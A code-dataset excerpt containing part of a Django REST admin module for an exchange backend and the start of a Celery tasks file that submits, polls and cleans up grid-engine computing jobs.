request.user.has_perm(perm_code)\n\n\nclass IsStaffAccess(BasePermission):\n \"\"\"\n Allows access only to authenticated Trainee users.\n \"\"\"\n\n def has_permission(self, request, view):\n return bool(request.user and request.user.is_authenticated and request.user.is_staff)\n\n def has_object_permission(self, request, view, obj):\n \"\"\"\n Return `True` if permission is granted, `False` otherwise.\n \"\"\"\n return self.has_permission(request, view)\n\n\nclass HasPermissionAccess(BasePermission):\n \"\"\"\n Allows access only to authenticated Trainee users.\n \"\"\"\n\n def has_permission(self, request, view):\n assert hasattr(view, 'get_permission_map'), \"\"\"\n Must be inherit from RestFulModelAdmin to use this permission\n \"\"\"\n return view.has_perm_action(view.action, request)\n\n def has_object_permission(self, request, view, obj):\n \"\"\"\n Return `True` if permission is granted, `False` otherwise.\n \"\"\"\n return view.has_perm_action(view.action, request, obj)\n\n\nclass ModelDiffHelper(object):\n def __init__(self, initial):\n self.__initial = self._dict(initial)\n self._new_object = None\n\n def set_changed_model(self, new_object):\n data = self._dict(new_object)\n if self._new_object is not None:\n self.__initial = data\n self._new_object = data\n return self\n\n @property\n def diff(self):\n if not self._new_object:\n return {}\n d1 = self.__initial\n d2 = self._new_object\n diffs = [(k, (v, d2[k])) for k, v in d1.items() if v != d2[k]]\n return dict(diffs)\n\n @property\n def has_changed(self):\n return bool(self.diff)\n\n @property\n def changed_fields(self):\n return list(self.diff.keys())\n\n def get_field_diff(self, field_name):\n \"\"\"\n Returns a diff for field if it's changed and None otherwise.\n \"\"\"\n return self.diff.get(field_name, None)\n\n def _dict(self, model):\n return model_to_dict(model, fields=[field.name for field in\n model._meta.fields])\n\n\nclass CustomMetadata(SimpleMetadata):\n label_lookup = SimpleMetadata.label_lookup\n\n def __init__(self, *args, **kwargs):\n super(CustomMetadata, self).__init__(*args, **kwargs)\n #TODO make consts for out fields\n self.label_lookup[JSDatetimeField] = 'datetime'\n self.label_lookup[PrimaryKeyRelatedField] = 'foreign'\n self.label_lookup[ManyRelatedField] = 'foreign'\n self.label_lookup[SerializerMethodField] = 'string'\n self.label_lookup[CurrencySerialRestField] = 'choice'\n self.label_lookup[PairSerialRestField] = 'choice'\n self.label_lookup[ImageField] = 'image-upload'\n self.label_lookup[ImageSerialField] = 'image-upload'\n self.label_lookup[RichTextSerialField] = 'rich-text'\n self.label_lookup[TextSerialField] = 'text'\n self.label_lookup[JsonSerialField] = 'json'\n self.label_lookup[ForeignSerialField] = 'foreign'\n\n def determine_metadata(self, request, view):\n metadata = OrderedDict()\n # view name\n metadata['name'] = view.get_view_name()\n # view detail page fields\n metadata['fields'] = []\n # view list page fields\n metadata['list_fields'] = []\n # actions with queryset\n metadata['actions'] = []\n # global actions. Queryset not used\n metadata['global_actions'] = []\n # ref models in detail page of entry\n metadata['inline_forms'] = []\n\n metadata['filters'] = []\n\n metadata['search_enabled'] = False\n\n if hasattr(view, 'get_single_serializer'):\n serializer = view.get_single_serializer()\n fields = self.get_serializer_info(serializer)\n metadata['fields'] = fields\n\n if hasattr(view, 'get_serializer'):\n serializer = view.get_serializer()\n fields = self.get_serializer_info(serializer)\n metadata['list_fields'] = fields\n\n if hasattr(view, 'actions'):\n actions = self.get_actions(view, view.actions)\n metadata['actions'] = actions\n\n if hasattr(view, 'global_actions'):\n actions = self.get_actions(view, view.global_actions)\n metadata['global_actions'] = actions\n\n if hasattr(view, 'inline_forms'):\n inlines = self.get_inline_forms(view, view.inline_forms)\n metadata['inline_forms'] = inlines\n\n if getattr(view, 'search_fields', None):\n metadata['search_enabled'] = True\n\n if getattr(view, 'filterset_fields', None):\n serializer = view.get_all_fields_serializer()\n fields = self.get_serializer_info(serializer)\n metadata['filters'] = {k: v for k, v in fields.items() if v['filterable']}\n\n\n return metadata\n\n def get_inline_forms(self, view, inlines):\n res = []\n for inline, filter_by in inlines:\n if isinstance(filter_by, str):\n filter_by = {filter_by: 'id'}\n if isinstance(filter_by, list):\n filter_by = {v: 'id' for v in filter_by}\n res.append({\n 'resource': site.get_resource_name_by_view_class(inline),\n 'filter_by': filter_by,\n 'fields': inline.list_display\n })\n return res\n\n def get_actions(self, view, view_actions):\n actions = []\n for action_name in view_actions:\n if not view.has_perm_action(action_name, view.request):\n continue\n\n action_fn = getattr(view, action_name, None)\n if action_fn:\n info = {\n 'url': view.reverse_action(action_name.replace('_', '-')),\n 'name': getattr(action_fn, 'short_description', action_fn.__name__),\n 'fields': [],\n }\n\n if isinstance(view_actions, dict):\n fields = []\n for field in view_actions[action_name]:\n if isinstance(field, str):\n field = {\n 'name': field,\n 'label': field.capitalize(),\n }\n\n # default text type\n if 'type' not in field:\n field['type'] = 'text'\n fields.append(field)\n info['fields'] = fields\n\n actions.append(info)\n\n return actions\n\n def get_field_attributes(self, serializer_field, model_field):\n attributes = OrderedDict()\n\n default = getattr(model_field, 'default', NOT_PROVIDED)\n is_nullable = getattr(model_field, 'null', None)\n is_read_only = getattr(serializer_field, 'read_only', None)\n # attributes['required'] = (default is NOT_PROVIDED) and not is_nullable and is_read_only\n\n attributes['required'] = getattr(serializer_field, 'required', False)\n attributes['nullable'] = getattr(model_field, 'null', False)\n\n attrs_dict = {\n 'read_only': 'read_only',\n 'label': 'label',\n 'help_text': 'hint',\n 'min_length': 'min_length',\n 'max_length': 'max_length',\n 'min_value': 'min',\n 'max_value': 'max',\n }\n\n for attr, front_attr in attrs_dict.items():\n value = getattr(serializer_field, attr, None)\n if value is not None and value != '':\n attributes[front_attr] = force_str(value, strings_only=True)\n\n if getattr(serializer_field, 'child', None):\n attributes['child'] = self.get_field_info(serializer_field.child)\n elif getattr(serializer_field, 'fields', None):\n attributes['children'] = self.get_serializer_info(serializer_field)\n\n if not isinstance(serializer_field, (serializers.RelatedField, serializers.ManyRelatedField)):\n if hasattr(serializer_field, 'choices'):\n attributes['choices'] = []\n if is_nullable:\n attributes['choices'].append({'value': None, 'text': '<empty>'})\n attributes['choices'].extend([\n {\n 'value': choice_value,\n 'text': force_str(choice_name, strings_only=True)\n }\n for choice_value, choice_name in serializer_field.choices.items()\n ])\n\n if self.label_lookup[serializer_field] == 'foreign':\n if isinstance(serializer_field, ManyRelatedField):\n model = serializer_field.child_relation.queryset.model\n attributes['multiple'] = True\n else:\n model = model_field.related_model\n attributes['reference'] = f'{site.get_resource_name(model)}'\n return attributes\n\n def get_field_info(self, field):\n \"\"\"\n Given an instance of a serializer field, return a dictionary\n of metadata about it.\n \"\"\"\n view = field.context['view']\n model_fields = {f.name: f for f in view._options.fields}\n model_field = model_fields.get(field.field_name)\n\n sortable_fields = getattr(view, 'ordering_fields', '__all__')\n filterable_fields = getattr(view, 'filterset_fields', None)\n\n field_info = OrderedDict()\n field_info['type'] = self.label_lookup[field]\n field_info['source'] = field.field_name\n field_info['sortable'] = False\n field_info['filterable'] = False\n\n field_info['default'] = self.get_field_default_value(model_field)\n\n if sortable_fields == '__all__' or (isinstance(sortable_fields, list) and field.field_name in sortable_fields):\n field_info['sortable'] = True\n\n if (isinstance(filterable_fields, list) or isinstance(filterable_fields, tuple)) \\\n and field.field_name in filterable_fields:\n field_info['filterable'] = True\n\n field_info['attributes'] = self.get_field_attributes(field, model_field)\n field_info['attributes']['searchable'] = field.field_name in (view.vue_resource_extras.get('searchable_fields') or [])\n\n return field_info\n\n def get_field_default_value(self, model_field):\n default = getattr(model_field, 'default', None)\n if default is NOT_PROVIDED:\n default = None\n elif callable(default):\n default = default()\n\n if isinstance(model_field, JSONField) or isinstance(model_field, models.JSONField):\n default = json.dumps(default, indent=2)\n return default\n\n\nclass RestFulModelAdmin(AuthPermissionViewSetMixin, viewsets.ModelViewSet):\n queryset = None\n single_serializer_class = None\n permission_classes = (IsStaffAccess, HasPermissionAccess)\n list_display = '__all__'\n fields = '__all__'\n readonly_fields = []\n ordering_fields = '__all__'\n filterset_fields = []\n search_fields = []\n metadata_class = CustomMetadata\n filter_backends = (GenericAllFieldsFilter, filters.OrderingFilter, filters.SearchFilter)\n vue_resource_extras: dict = {}\n inline_forms: [] # detail page entities\n\n def __init__(self, *args, **kwargs):\n super(RestFulModelAdmin, self).__init__(*args, **kwargs)\n filterset_fields = set(self.filterset_fields)\n filterset_fields.add('id')\n\n for field in self._options.fields:\n if type(field) in [models.OneToOneField, models.ForeignKey, models.ManyToManyField]:\n filterset_fields.add(field.name + '_id')\n\n self.filterset_fields = tuple(filterset_fields)\n\n def get_readonly_fields(self):\n return self.readonly_fields\n\n @classmethod\n def has_add_permission(cls):\n return True\n\n @classmethod\n def has_update_permission(cls):\n return True\n\n @classmethod\n def has_delete_permission(cls):\n return True\n\n @classmethod\n def get_view_permissions(cls):\n res = ['show', 'list']\n if cls.has_add_permission():\n res.append('create')\n if cls.has_update_permission():\n res.append('edit')\n if cls.has_delete_permission():\n res.append('delete')\n return res\n\n @staticmethod\n def get_doc():\n return 'asd'\n\n def get_urls(self):\n return []\n\n def get_permission_map(self):\n permission_map = {\n 'list': self._make_permission_key('view'),\n 'retrieve': self._make_permission_key('view'),\n 'create': self._make_permission_key('add'),\n 'update': self._make_permission_key('change'),\n 'partial_update': self._make_permission_key('change'),\n 'destroy': self._make_permission_key('delete'),\n }\n permission_map.update(self.permission_map)\n return permission_map\n\n def log_addition(self, request, object, message):\n \"\"\"\n Log that an object has been successfully added.\n\n The default implementation creates an admin LogEntry object.\n \"\"\"\n from django.contrib.admin.models import LogEntry, ADDITION\n return LogEntry.objects.log_action(\n user_id=request.user.pk,\n content_type_id=get_content_type_for_model(object).pk,\n object_id=object.pk,\n object_repr=str(object),\n action_flag=ADDITION,\n change_message=message,\n )\n\n def log_change(self, request, object, message):\n \"\"\"\n Log that an object has been successfully changed.\n\n The default implementation creates an admin LogEntry object.\n \"\"\"\n from django.contrib.admin.models import LogEntry, CHANGE\n return LogEntry.objects.log_action(\n user_id=request.user.pk,\n content_type_id=get_content_type_for_model(object).pk,\n object_id=object.pk,\n object_repr=str(object),\n action_flag=CHANGE,\n change_message=message,\n )\n\n def log_deletion(self, request, object, object_repr):\n \"\"\"\n Log that an object will be deleted. Note that this method must be\n called before the deletion.\n\n The default implementation creates an admin LogEntry object.\n \"\"\"\n from django.contrib.admin.models import LogEntry, DELETION\n return LogEntry.objects.log_action(\n user_id=request.user.pk,\n content_type_id=get_content_type_for_model(object).pk,\n object_id=object.pk,\n object_repr=object_repr,\n action_flag=DELETION,\n )\n\n def get_single_serializer_class(self):\n return self.single_serializer_class if self.single_serializer_class else self.get_serializer_class(True)\n\n def get_all_fields_serializer(self, *args, **kwargs):\n serializer_class = self.get_serializer_class(all_fields=True)\n kwargs['context'] = self.get_serializer_context()\n return serializer_class(*args, **kwargs)\n\n def get_single_serializer(self, *args, **kwargs):\n \"\"\"\n Return the serializer instance that should be used for validating and\n deserializing input, and for serializing output.\n \"\"\"\n serializer_class = self.get_single_serializer_class()\n kwargs['context'] = self.get_serializer_context()\n return serializer_class(*args, **kwargs)\n\n def get_serializer_representation_fn(self, cls):\n \"\"\"Custom fields representation fn\"\"\"\n def validate_fn(sf, instance):\n \"\"\"\n Object instance -> Dict of primitive datatypes.\n \"\"\"\n ret = OrderedDict()\n fields = sf._readable_fields\n\n for field in fields:\n try:\n attribute = field.get_attribute(instance)\n except SkipField:\n continue\n\n # We skip `to_representation` for `None` values so that fields do\n # not have to explicitly deal with that case.\n #\n # For related fields with `use_pk_only_optimization` we need to\n # resolve the pk value.\n check_for_none = attribute.pk if isinstance(attribute, PKOnlyObject) else attribute\n if check_for_none is None:\n ret[field.field_name] = None\n else:\n repr = field.to_representation(attribute)\n if isinstance(field, JsonSerialField) or isinstance(field, RichTextSerialField):\n repr = mark_safe(repr)\n if isinstance(repr, str) and not isinstance(repr, SafeString):\n repr = escape(repr)\n ret[field.field_name] = repr\n return ret\n\n return validate_fn\n\n def get_serializer_class(self, single=False, all_fields=False):\n serializer_class = super().get_serializer_class()\n\n view_fields = self.fields if single else self.list_display\n if isinstance(view_fields, tuple):\n view_fields = list(view_fields)\n\n if not view_fields or view_fields == '__all__' or all_fields:\n serializer_class_fields = list([f.name for f in serializer_class.Meta.model._meta.fields])\n else:\n if 'id' not in view_fields:\n view_fields = ['id'] + view_fields\n serializer_class_fields = view_fields\n\n serializer_class_fields += ['_label'] # default object representation\n\n # redefine serializer fields\n serializer_class._declared_fields = {}\n for field_name in serializer_class_fields:\n if callable(getattr(self, field_name, None)):\n # add SerializerMethodField and its method to serializer\n field_method = getattr(self, field_name)\n # if custom field type defined\n if hasattr(field_method, 'serial_class'):\n serializer_class._declared_fields[field_name] = field_method.serial_class()\n else:\n serializer_class._declared_fields[field_name] = SerializerMethodField()\n setattr(serializer_class, f'get_{field_name}', field_method)\n if field_name == '_label':\n serializer_class._declared_fields[field_name] = SerializerMethodField()\n setattr(serializer_class, f'get_{field_name}', lambda self_cls, obj: str(obj))\n\n # setup readonly fields\n readonly_fields = self.get_readonly_fields()\n if isinstance(readonly_fields, list) or isinstance(readonly_fields, tuple):\n serializer_class.Meta.read_only_fields = readonly_fields\n\n # search original classes for translated fields and delete original field\n translated_fields_classes = {}\n to_remove_original_translated_fields = set()\n serializer_fields_classes = {f.name: f.__class__ for f in serializer_class.Meta.model._meta.fields}\n for model_field in serializer_class.Meta.model._meta.fields:\n if model_field.__class__.__name__.startswith('Translation'):\n original_field_name = model_field.name.rsplit('_', 1)[0]\n to_remove_original_translated_fields.add(original_field_name)\n if original_field_name in serializer_fields_classes:\n translated_fields_classes[model_field.name] = serializer_fields_classes[original_field_name]\n else:\n to_remove_original_translated_fields.add(model_field.name)\n\n serializer_class_fields = [f for f in serializer_class_fields\n if f not in to_remove_original_translated_fields]\n\n # custom fields\n for model_field in serializer_class.Meta.model._meta.fields:\n if model_field.name not in serializer_class_fields:\n # skip missing fields\n continue\n\n CustomField = None\n field_args = {}\n\n field_type = type(model_field)\n\n # handle translated fields\n if model_field.name in translated_fields_classes:\n field_type = translated_fields_classes[model_field.name]\n\n if isinstance(model_field, models.DateTimeField):\n CustomField = JSDatetimeField\n elif isinstance(model_field, models.ForeignKey) and not single:\n CustomField = ForeignSerialField\n elif field_type == CurrencyModelField:\n CustomField = CurrencySerialRestField\n elif field_type == PairModelField:\n CustomField = PairSerialRestField\n elif field_type == RichTextField:\n CustomField = RichTextSerialField\n elif field_type == models.TextField:\n CustomField = TextSerialField\n elif field_type in [models.ImageField, SVGAndImageField, ImageSerialField]:\n CustomField = ImageSerialField\n elif field_type in [JSONField, models.JSONField]:\n CustomField = JsonSerialField\n\n if CustomField:\n is_read_only = model_field.name in readonly_fields \\\n or getattr(model_field, 'auto_now', False) \\\n or getattr(model_field, 'auto_now_add', False)\n default = getattr(model_field, 'default', NOT_PROVIDED)\n is_nullable = getattr(model_field, 'null', None)\n if CustomField != ForeignSerialField:\n field_args['required'] = (default is NOT_PROVIDED) and not is_nullable and not is_read_only\n\n field_args['read_only'] = is_read_only\n field_args['allow_null'] = model_field.null\n if CustomField in [TextSerialField, RichTextSerialField]:\n field_args['allow_blank'] = model_field.blank\n serializer_class._declared_fields[model_field.name] = CustomField(**field_args)\n\n serializer_class.Meta.fields = serializer_class_fields\n setattr(serializer_class, 'to_representation', self.get_serializer_representation_fn(serializer_class))\n return serializer_class\n\n def list(self, request, *args, **kwargs):\n \"\"\"list all of objects\"\"\"\n queryset = self.filter_queryset(self.get_queryset())\n\n page = self.paginate_queryset(queryset)\n if page is not None:\n serializer = self.get_serializer(page, many=True)\n return self.get_paginated_response(serializer.data)\n\n serializer = self.get_serializer(queryset, many=True)\n return Response(serializer.data)\n\n def create(self, request, **kwargs):\n \"\"\"Create new object\"\"\"\n serializer = self.get_single_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n self.perform_create(serializer)\n self.log_addition(request, serializer.instance, [{'added': {\n 'name': str(serializer.instance._meta.verbose_name),\n 'object': str(serializer.instance),\n }}])\n headers = self.get_success_headers(serializer.data)\n return Response(serializer.data, status=status.HTTP_201_CREATED, headers=headers)\n\n def retrieve(self, request, pk=None, **kwargs):\n \"\"\"Get object Details\"\"\"\n instance = self.get_object()\n serializer = self.get_single_serializer(instance)\n return Response(serializer.data)\n\n def update(self, request, pk=None, **kwargs):\n \"\"\"Update object\"\"\"\n partial = kwargs.pop('partial', False)\n instance = self.get_object()\n serializer = self.get_single_serializer(instance, data=request.data, partial=partial)\n serializer.is_valid(raise_exception=True)\n helper = ModelDiffHelper(instance)\n self.perform_update(serializer)\n\n self.log_change(\n request,\n serializer.instance,\n [{'changed': {\n 'name': str(serializer.instance._meta.verbose_name),\n 'object': str(serializer.instance),\n 'fields': helper.set_changed_model(serializer.instance).changed_fields\n }}]\n )\n\n if getattr(instance, '_prefetched_objects_cache', None):\n # If 'prefetch_related' has been applied to a queryset, we need to\n # forcibly invalidate the prefetch cache on the instance.\n instance._prefetched_objects_cache = {}\n\n return Response(serializer.data)\n\n def partial_update(self, request, pk=None, **kwargs):\n \"\"\"Partial Update\"\"\"\n return super().partial_update(request, pk=pk, **kwargs)\n\n def destroy(self, request, pk=None, **kwargs):\n \"\"\"Delete object\"\"\"\n instance = self.get_object()\n self.log_deletion(request, instance, [{\n 'deleted': {\n 'name': str(instance._meta.verbose_name),\n 'object': str(instance),\n }\n }])\n self.perform_destroy(instance)\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n\nclass RestFulAdminSite:\n def __init__(self, view_class=RestFulModelAdmin):\n self._registry = {}\n self._model_by_view_registry = {}\n self._url_patterns = []\n self.default_view_class = view_class\n\n def get_registered_models(self):\n res = []\n for model in self._registry:\n res.append(self.get_model_url(model))\n return sorted(res)\n\n def get_resource_name_by_view_class(self, view_class):\n inv_map = {v: k for k, v in self._registry.items()}\n model = inv_map.get(view_class)\n if model:\n return self.get_resource_name(model)\n model = self._model_by_view_registry.get(view_class)\n if model:\n return self.get_resource_name(model)\n\n def get_resources(self):\n res = []\n for model, view in self._registry.items():\n # https://www.okami101.io/vuetify-admin/guide/resources.html#resource-object-structure\n data = {\n 'name': self.get_resource_name(model),\n 'actions': view.get_view_permissions(),\n 'api': f'/{self.get_model_url(model)}/',\n 'aside': False,\n }\n if view.vue_resource_extras:\n data.update(view.vue_resource_extras)\n\n res.append(data)\n return res\n\n def make_navigation(self, user):\n all_permissions = get_user_permissions(user)\n is_admin = 'admin' in all_permissions\n menu = settings.VUE_ADMIN_SIDE_MENU\n\n new_menu = []\n\n for entry in menu:\n model = entry.get('model')\n if not model:\n new_menu.append(entry)\n else:\n app_label, model_name = model.split('.')\n # todo check model existence\n view_perm_name = f'{app_label}_{model_name}_view'\n if is_admin or view_perm_name in all_permissions:\n new_menu.append({\n 'icon': entry.get('icon'),\n 'link': {'name': f'{app_label}_{model_name}_list'},\n 'text': entry.get('text') or (f'{app_label.capitalize()} {model_name.capitalize()}')\n })\n return new_menu\n\n def register_decorator(self, *model_or_iterable, **options):\n def wrapper(view_class):\n self.register(model_or_iterable, view_class, **options)\n return view_class\n\n return wrapper\n\n def register(self, model_or_iterable, view_class=None, **options):\n if not view_class:\n view_class = self.default_view_class\n\n if isinstance(model_or_iterable, ModelBase):\n model_or_iterable = [model_or_iterable]\n for model in model_or_iterable:\n if model._meta.abstract:\n raise ImproperlyConfigured(\n 'The model %s is abstract, so it cannot be registered with admin.' % model.__name__\n )\n\n if model in self._registry:\n raise AlreadyRegistered('The model %s is already registered' % model.__name__)\n options.update({\n \"__doc__\": self.generate_docs(model)\n })\n self._model_by_view_registry[view_class] = model\n view_class = type(\"%sAdmin\" % model.__name__, (view_class,), options)\n # self.set_docs(view_class, model)\n # Instantiate the admin class to save in the registry\n self._registry[model] = view_class\n\n def register_url_pattern(self, url_pattern):\n self._url_patterns.append(url_pattern)\n\n @classmethod\n def generate_docs(cls, model):\n return \"\"\"\n ### The APIs include:\n\n\n > `GET` {app}/{model} ===> list all `{verbose_name_plural}` page by page;\n\n > `POST` {app}/{model} ===> create a new `{verbose_name}`\n\n > `GET` {app}/{model}/123 ===> return the details of the `{verbose_name}` 123\n\n > `PATCH` {app}/{model}/123 and `PUT` {app}/{model}/123 ==> update the `{verbose_name}` 123\n\n > `DELETE` {app}/{model}/123 ===> delete the `{verbose_name}` 123\n\n > `OPTIONS` {app}/{model} ===> show the supported verbs regarding endpoint `{app}/{model}`\n\n > `OPTIONS` {app}/{model}/123 ===> show the supported verbs regarding endpoint `{app}/{model}/123`\n\n \"\"\".format(\n app=model._meta.app_label,\n model=model._meta.model_name,\n verbose_name=model._meta.verbose_name,\n verbose_name_plural=model._meta.verbose_name_plural\n )\n\n def unregister(self, model_or_iterable):\n \"\"\"\n Unregister the given model(s).\n\n If a model isn't already registered, raise NotRegistered.\n \"\"\"\n if isinstance(model_or_iterable, ModelBase):\n model_or_iterable = [model_or_iterable]\n for model in model_or_iterable:\n if model not in self._registry:\n raise NotRegistered('The model %s is not registered' % model.__name__)\n del self._registry[model]\n\n def is_registered(self, model):\n \"\"\"\n Check if a model class is registered with this `AdminSite`.\n \"\"\"\n return model in self._registry\n\n def get_model_basename(self, model):\n return None\n\n def get_model_url(self, model):\n return '%s/%s' % (model._meta.app_label, model._meta.model_name)\n\n def get_resource_name(self, model):\n return f'{model._meta.app_label}_{model._meta.model_name}'\n\n def get_urls(self):\n router = DefaultRouter()\n view_sets = []\n for model, view_set in self._registry.items():\n if view_set.queryset is None:\n view_set.queryset = model.objects.all()\n # Creates default serializer\n if view_set.serializer_class is None:\n serializer_class = type(\"%sModelSerializer\" % model.__name__, (ModelSerializer,), {\n \"Meta\": type(\"Meta\", (object,), {\n \"model\": model,\n \"fields\": \"__all__\"\n }),\n })\n view_set.serializer_class = serializer_class\n\n view_sets.append(view_set)\n router.register(self.get_model_url(model), view_set, self.get_model_basename(model))\n\n return router.urls + self._url_patterns\n\n @property\n def urls(self):\n return self.get_urls()\n\n\nsite = RestFulAdminSite()\n\n\ndef register(*model_or_iterable, **options):\n return site.register_decorator(*model_or_iterable, **options)\n\n\ndef action(permissions=None, methods=['POST'], detail=False, url_path=None, url_name=None, custom_response=False,\n **kwargs):\n def decorator(func):\n base_func = base_action(methods, detail, url_path, url_name, **kwargs)(func)\n base_func.permissions = permissions\n\n @wraps(base_func)\n def wrapper(base_admin_class, request, *args, **kwargs):\n ids = request.data.get('ids')\n\n Model = base_admin_class.serializer_class.Meta.model\n queryset = Model.objects.filter(id__in=ids) if ids else Model.objects.none()\n\n res = base_func(base_admin_class, request, queryset, *args, **kwargs)\n if queryset:\n for entry in queryset:\n LogEntry.objects.log_action(\n user_id=request.user.pk,\n content_type_id=get_content_type_for_model(entry).pk,\n object_id=entry.pk,\n object_repr=str(entry),\n action_flag=CHANGE,\n change_message=[{'action': {\n 'name': f'{base_admin_class.__class__.__name__} {base_func.__name__}',\n 'object': str(entry),\n }}],\n )\n else:\n LogEntry.objects.log_action(\n user_id=request.user.pk,\n content_type_id=None,\n object_id=None,\n object_repr='',\n action_flag=CHANGE,\n change_message=[{'action': {\n 'name': f'{base_admin_class.__class__.__name__} {base_func.__name__}',\n }}],\n )\n\n if custom_response:\n return res\n\n if res is None:\n return Response(status=status.HTTP_200_OK)\n return Response(res, status=status.HTTP_200_OK)\n\n return wrapper\n\n return decorator\n\n\nclass DefaultApiAdmin(RestFulModelAdmin):\n ordering = ('-id',)\n # permission_classes = (AllowAny, )\n # filter_backends = [GenericAllFieldsFilter, filters.OrderingFilter, filters.SearchFilter]\n","repo_name":"Polygant/OpenCEX-backend","sub_path":"admin_rest/restful_admin.py","file_name":"restful_admin.py","file_ext":"py","file_size_in_byte":37959,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"37"} +{"seq_id":"23765529590","text":"import celery\nimport logging\nimport pytz\nimport requests\nimport subprocess\nimport typing\nimport uuid\n\nfrom celery import task\nfrom datetime import datetime as dt\nfrom datetime import timedelta\nfrom dateutil.parser import parse\nfrom django.conf import settings\nfrom django.db.models import F\nfrom django.utils import timezone\nfrom pathlib import Path\n\nfrom jobs.models import Job, JobLog, Priority, Status\nfrom jobs.serializers import JobSerializer\nfrom jobs.utils import TokenAuth\nfrom users.models import User\n\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.INFO)\n\n##test for push\n# Group of Celery task actions\n@task(bind=True, ignore_result=True)\ndef activate_job(self: celery.Task, *, pk: typing.Union[str, uuid.UUID]):\n \"\"\"\n Takes existing Job object instances from Django API\n Submits their data to the SCC for processing\n\n called via: `scheduled_allocate_job`\n\n \"\"\"\n try:\n job = Job.objects.get(pk=pk)\n\n if job.status == Status.QUEUED:\n job.status = Status.ACTIVE\n\n ftplus_path = Path(\n settings.SCC_FTPLUS_PATH, \"jobs-in-process\", f\"{job.uuid}\"\n )\n\n # have we already untarred our job files?\n if not ftplus_path.exists():\n ftplus_path.mkdir(parents=True)\n subprocess.run(\n [\n \"tar\",\n \"-xf\",\n f\"{job.input_file.path}\",\n \"-C\",\n f\"{ftplus_path}\",\n ]\n )\n\n # Ensure {ftplus_path}/settings.SCC_RUN_FILE exists\n try:\n runfile = ftplus_path.joinpath(settings.SCC_RUN_FILE)\n if not runfile.exists():\n raise Exception(f\"{settings.SCC_RUN_FILE} doesn't exist\")\n\n JobLog.objects.create(job=job, event=\"Job status changed to active\")\n\n if job.priority == Priority.HIGH:\n priority = -100\n elif job.priority == Priority.NORMAL:\n priority = -500\n elif job.priority == Priority.LOW:\n priority = -1000\n else:\n priority = -1000\n\n # TODO: Add a priority to the job...\n cmd = [\n f\"{settings.GRID_ENGINE_SUBMIT_CMD}\",\n \"-p\",\n f\"{priority}\",\n \"-cwd\",\n f\"{ftplus_path}/{settings.SCC_RUN_FILE}\",\n ]\n if job.priority == Priority.HIGH:\n cmd = [\"python\", f\"{ftplus_path}/{settings.SCC_RUN_FILE}\"]\n \n #checking the push to see it update\n logging.debug(cmd)\n\n # qsub must be run from inside job.uuid directory\n job_submit = subprocess.run(\n cmd, capture_output=True, text=True, cwd=ftplus_path\n )\n logging.debug(job_submit.stdout)\n\n # Assign SGE ID to job\n # Successful qsub stdout = Your job 6274206 (\"ls -al\") has been submitted\n sge_task_id = job_submit.stdout.split(\" \")[2] \n job.sge_task_id = int(sge_task_id)\n job.save()\n JobLog.objects.create(job=job, event=\"Job sge_task_id added\")\n\n except Exception as e:\n job.status = Status.ERROR\n job.save()\n msg = f\"Job status changed to error. Exception: {e}\"\n JobLog.objects.create(job=job, event=msg)\n logger.exception(msg)\n else:\n return\n\n except Job.DoesNotExist:\n logger.warning(f\"Job {pk} does not exist\")\n\n\n@task(bind=True, ignore_result=True)\ndef delete_job(self: celery.Task, *, pk: typing.Union[str, uuid.UUID]):\n \"\"\"\n Sets Job.status to Status.DELETED in Django\n Also delete job directory and associated files on SCC\n \"\"\"\n try:\n job = Job.objects.get(pk=pk)\n\n if job.status != Status.DELETED:\n job.status = Status.DELETED\n job.save()\n JobLog.objects.create(job=job, event=\"Job status changed to deleted\")\n\n # Grid Engine Qdel ONLY stops/deletes a job. We have to handle file system.\n cmd = settings.GRID_ENGINE_DELETE_CMD.split(\" \")\n if isinstance(cmd, list):\n job_delete = subprocess.run(cmd, capture_output=True)\n else:\n job_delete = subprocess.run([cmd], capture_output=True)\n\n # Remove jobs-in-process dir created in activate_job\n ftplus_path = Path(settings.SCC_FTPLUS_PATH, \"jobs-in-process\", f\"{job.uuid}\")\n if ftplus_path.exists():\n subprocess.run([\"rm\", \"-rf\", f\"{ftplus_path}\"])\n\n except Job.DoesNotExist:\n logger.warning(f\"Job {pk} does not exist\")\n\n\ndef parse_qstat_output(output: str):\n \"\"\"\n Takes output from qstat, captured by job_poll in scheduled_poll_job()\n Returns list of dictionaries. Each dict represents 1 row of qstat output\n That data is sent to update_jobs(), to update Job instances in web app\n \"\"\"\n if \"submit/start at\" in output:\n output = output.replace(\"submit/start at\", \"submit-start-at\")\n if len(output) < 5:\n return []\n\n lines = [line for line in output.split(\"\\n\") if len(line)]\n header_keys = [column for column in lines[0].split(\" \") if len(column)]\n\n headers = {}\n header_cols = []\n for header_col in range(len(header_keys)):\n header = header_keys[header_col]\n start = lines[0].find(header)\n try:\n next_header = header_keys[header_col + 1]\n end = lines[0].find(next_header)\n except IndexError:\n end = None\n\n header_cols.append(start)\n headers[header] = {\n \"name\": header,\n \"start\": start,\n \"end\": end,\n }\n\n rows = []\n for row in lines[2:]:\n #if \"@scc-\" in row:\n data = {}\n for column in headers:\n start = headers[column][\"start\"]\n end = headers[column][\"end\"]\n if end:\n data[column] = row[start:end].strip()\n else:\n data[column] = row[start:].strip()\n \n \n #data = {}\n #for column in headers:\n # start = headers[column][\"start\"]\n # end = headers[column][\"end\"]\n # if end:\n # data[column] = row[start:end].strip()\n # else:\n # data[column] = row[start:].strip()\n rows.append(data)\n return rows\n\n\n@task(bind=True, ignore_result=True, max_retries=0)\ndef scheduled_allocate_job(self: celery.Task) -> None:\n \"\"\"\n Allocates existing Job instances to Celery at a set interval\n Interval determined by settings.CELERY_BEAT_SCHEDULE\n Should do so based on availability of different priority queues\n Availability based on settings.SCC_MAX_{priority}_JOBS\n \"\"\"\n\n start = dt.now()\n # Look at how many jobs are Status.QUEUED, and Status.ACTIVE\n has_queued_jobs = bool(Job.objects.queued().exists())\n\n # Do we have any queued jobs ready to schedule?\n if has_queued_jobs:\n # Allocate *low* priority jobs\n active_jobs = Job.objects.exclude_imported().active()\n logger.info(f\"{active_jobs.count()} jobs are active\")\n\n queued_jobs = Job.objects.exclude_imported().queued()\n # queued_jobs = Job.objects.queued()\n logger.info(f\"{queued_jobs.count()} jobs are queued\")\n\n # if jobs_in_process < settings.SCC_MAX_LOW_JOBS:\n # jobs_to_allocate = 100\n # logger.info(f\"{jobs_to_allocate} new jobs were allocated\")\n for queued_job in queued_jobs.all(): # 